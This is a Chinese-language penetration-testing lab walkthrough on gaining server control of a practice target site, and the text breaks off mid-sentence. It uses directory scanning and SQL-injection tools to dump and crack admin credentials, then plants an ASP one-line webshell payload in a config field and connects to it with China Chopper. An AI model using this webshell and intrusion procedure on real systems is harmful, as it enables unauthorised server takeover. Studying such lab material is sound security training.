通过菜刀工具获取目标主机权限.docxVIP

获取webshell后，上传一句话木马，通过中国菜刀连接启动3389服务，添加管理员账户，获取目标主机的权限 获取webshell插入一句话木马的方法有很多，不一定是通过sql注入。从中国菜刀连接上靶机后，获取服务器权限的步骤方式都一样 Setp 0 实验环境 操作机：Windows XP [] 目标机：Windows server 2003 [] 实验工具： 中国菜刀 Pr 御剑 Pangolin 3389 本实验要求获取www.test.ichunqiu网站的服务器权限。 Step 1 目录扫描 工具：御剑? ? 路径：C:\Tools\目录扫描\ 打开御剑，在域名中输入http://www.test.ichunqiu，开始扫描； 在目录列表中查找后台，发现存在/admin 双击打开后台登录页面http://www.test.ichunqiu/admin 不过用户名和密码都不知道，没关系，进行下一步：获取用户名和密码。 Step 2 工具：旁注WEB综合检测程序Ver3.6修正版 路径：C:\Tools\注入工具\Domain3.6\Domain3.6.exe 打开工具，依次点击 [SQL注入] --[批量扫描注入点] -- [添加网址] -- [批量分析注入点]； 出现下面这个对话框说明已经检测完毕； 点击OK进行下一步； 注入点分析完毕后，会在下方列表中显示可注入的地址，选择其中一个地址，右键选择 [检测注入]； 点击 [检测注入] 后，主界面从 [批量扫描注入点] 转到 [SQL注入猜解检测]，点击 [开始检测]； 检测完毕后，显示可以注入，并列出了数据库类型：Access数据库； 下面开始逐步 [猜解表名] --[猜解列名]-- [猜解内容]；点击 [猜解表名] 后，在数据库列表中会显示4个表，分别是admin、user、movie和news； 选择admin表，点击 [猜解列名]，成功猜解出三个列名id、username和password； 勾选username和password，点击 [猜解内容]，右侧列表中成功显示用户名admin，密码469e80d32c0559f8 当然密码是MD5加密的，打开本机浏览器，输入，输入刚刚查询到的密文，点击 [解密]； 成功找到明文密码：admin888；注入的方法与工具很多，或者也可以这样：在浏览器中打开网站首页http://www.test.ichunqiu，在最新产品中随便选择一个打开 [注入点太多]； ?复制URL [www.test.ichunqiu/ProductShow.asp?ID=7]，使用工具：穿山甲工具：[穿山甲Pangolin]? ??路径： C:\Tools\注入工具\pangolinPangolin是一款帮助渗透测试人员进行Sql注入测试的安全工具。所谓的SQL注入测试就是通过利用目标网站的某个页面缺少对用户传递参数控制或者控制的不够好的情况下出现的漏洞，从而达到获取、修改、删除数据，甚至控制数据库服务器、Web服务器的目的的测试方法； 打开穿山甲，输入URL，点击绿色三角箭头进行注入操作； 点击 [Dates] 切换到Dates选项卡，点击 [Tables] 成功猜解出4张表； 获取内容的原理同Domain的使用方法一样，[猜解表名]--[猜解列名]--[猜解内容]； 同样能获取用户名和密码； ?下一步：登录后台，上传木马；Setp 3打开后台登录页面，输入用户名admin，密码admin888，输入验证码，点击 [ENTER] 登录后台； 久违的后台终于进去了…. 点击左侧菜单栏中的 [系统设置管理]--[网站信息配置]，用修改配置文件的方法获取WebShell； 打开相应页面后，将 [公司名称] 内容修改为一句话木马?%%Eval Request(Chr(35))%%写一句话木马的时候注意闭合；?点击最下面的 [保存设置] 按钮； 如果插马成功，[公司名称] 内容为空； 打开 [中国菜刀] 连接一句话木马；工具：中国菜刀? ? 路径：C:\Tools\webshell\中国菜刀 打开菜刀，右键空白处，选择 [添加]； 在地址栏中输入http://www.test.ichunqiu/inc/config.asp，为什么是这个路径？因为我们刚才修改的网站信息配置页面，就是这个路径，可以自己下载一个魅力企业网站管理系统源码看看，2007或2009版的都行，里面的目录结构一目了然；连接密码为#，密码为什么是#？ 往上看一句话木马，里面有个chr(35)，#的ascii码就是35，当然这个密码可以随便设置，只要保证服务端一句话木马里的密码和添加SHELL时输入的密